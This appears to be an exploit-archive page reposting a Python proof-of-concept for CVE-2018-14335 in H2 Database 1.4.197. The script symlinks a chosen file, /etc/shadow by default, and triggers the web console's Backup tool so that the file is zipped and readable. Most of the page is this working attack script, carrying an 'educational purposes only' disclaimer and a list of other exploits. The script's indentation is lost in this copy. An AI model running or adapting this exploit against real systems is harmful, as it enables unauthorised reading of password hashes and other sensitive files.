H2 database 1.4.197 information disclosure Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-07-30 | Type : webapps | Platform : linux
This exploit / vulnerability H2 database 1.4.197 information disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335

# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.

# PS, thanks to HTB and our team FallenAngels

#!/usr/bin/python

import requests
import argparse
import os
import random

def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)

def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)


def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName

if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()

create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)

H2 database 1.4.197 information disclosure


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
H2 database 1.4.197 information disclosure Vulnerability / Exploit